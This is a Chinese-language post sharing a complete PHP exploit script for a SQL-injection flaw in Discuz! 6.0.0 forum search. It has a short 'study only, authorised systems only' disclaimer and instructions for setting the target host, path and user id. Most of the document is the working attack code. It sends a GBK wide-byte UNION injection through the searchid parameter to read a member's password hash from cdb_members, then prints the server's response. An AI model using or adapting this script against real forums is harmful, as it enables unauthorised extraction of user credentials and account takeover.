杜工版discuz6.0.0漏洞利用脚本
学习研究技术用,切勿用于非法用途
修改脚本中的域名($host)、论坛目录($path)和目标用户 uid($uid)后运行，在输出的 HTTP 响应中查找该用户 password 字段的值(Discuz 保存的通常是哈希而非明文)。如果没有出现，说明论坛已修复此漏洞，或者目标与脚本的假设不符(例如表前缀不是 cdb_、连接字符集不是 GBK)，因此“无输出”并不能完全证明已修复。只能对已获得授权的系统运行。
代码如下:
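<?php
declare(strict_types=1);

/*
 * Discuz! 6.0.0 search SQL-injection proof of concept ("杜工" edition).
 * For study only; never run it against a system you are not authorised to test.
 *
 * NOTE(review): the listing this was copied from was HTML-entity-mangled
 * (`E_ALL&E;_NOTICE`, `&searchid;=`, `&do;=`). The error_reporting mask and
 * the two parameter names below are reconstructed from that; everything else
 * in the payload is reproduced byte-for-byte.
 */

// Report everything except notices (the original expression was garbled;
// suppressing notices is the usual intent in scripts of this era).
error_reporting(E_ALL & ~E_NOTICE);

$host = 'www.xxx.com';   // target host name, no scheme
$path = 'forum/';        // directory holding the Discuz! index.php; surrounding slashes optional
$port = 80;
$uid  = 1;               // cdb_members.uid whose `password` column is extracted

/**
 * Build the form body that carries the injected search query.
 *
 * The injection point is `searchid`. The `%cf` byte presumably exists so that,
 * under a GBK connection, the backslash added by escaping is swallowed as the
 * second byte of a wide character and the quote survives (classic wide-byte
 * injection). The UNION then selects `password` from `cdb_members` for $uid and
 * the trailing `/*` comments out the remainder of the original statement.
 *
 * The table prefix `cdb_` and the column count are hard-coded; a target with a
 * different prefix returns nothing even if it is vulnerable.
 *
 * @param int $uid member id to read; typed int so nothing else can be injected here
 */
function build_exploit_body(int $uid): string
{
    return 'action=search&searchid=22%cf\' UNION SELECT 1,password,3,password'
        . '/**/from/**/cdb_members/**/where/**/uid=' . $uid . '/*&do=submit';
}

/**
 * Assemble a raw HTTP/1.1 POST to <path>/index.php carrying $body.
 *
 * @param string $host value for the Host header
 * @param string $path forum directory; "forum/", "/forum" and "forum" all map
 *                     to /forum/index.php (the original produced "/forum//index.php")
 * @param string $body url-encoded form body; Content-Length is derived from it,
 *                     and nothing is sent after it
 */
function build_request(string $host, string $path, string $body): string
{
    $dir    = trim($path, '/');
    $target = '/' . ($dir === '' ? '' : $dir . '/') . 'index.php';

    $headers = [
        'POST ' . $target . ' HTTP/1.1',
        'Accept: */*',
        'Accept-Language: zh-cn',
        'Content-Type: application/x-www-form-urlencoded',
        'User-Agent: wap',   // kept from the original; the targeted code path may depend on it
        'Host: ' . $host,
        'Content-Length: ' . strlen($body),
        'Connection: Close',
    ];

    return implode("\r\n", $headers) . "\r\n\r\n" . $body;
}

$request = build_request($host, $path, build_exploit_body($uid));

// Connect with a bounded timeout so a filtered port does not hang the script,
// and capture the reason for a failed connect instead of discarding it.
$errno  = 0;
$errstr = '';
$sock   = fsockopen($host, $port, $errno, $errstr, 10);
if ($sock === false) {
    echo 'No response from ' . $host . ' (' . $errno . ': ' . $errstr . ")\n";
    exit(1);
}

try {
    if (fwrite($sock, $request) === false) {
        echo 'Failed to send request to ' . $host . "\n";
        exit(1);
    }
    // Stream the response straight through; the user inspects the output for
    // the `password` value. Stop on a read error rather than spinning on feof().
    while (!feof($sock)) {
        $line = fgets($sock, 1024);
        if ($line === false) {
            break;
        }
        echo $line;
    }
} finally {
    fclose($sock);   // the original never closed the socket
}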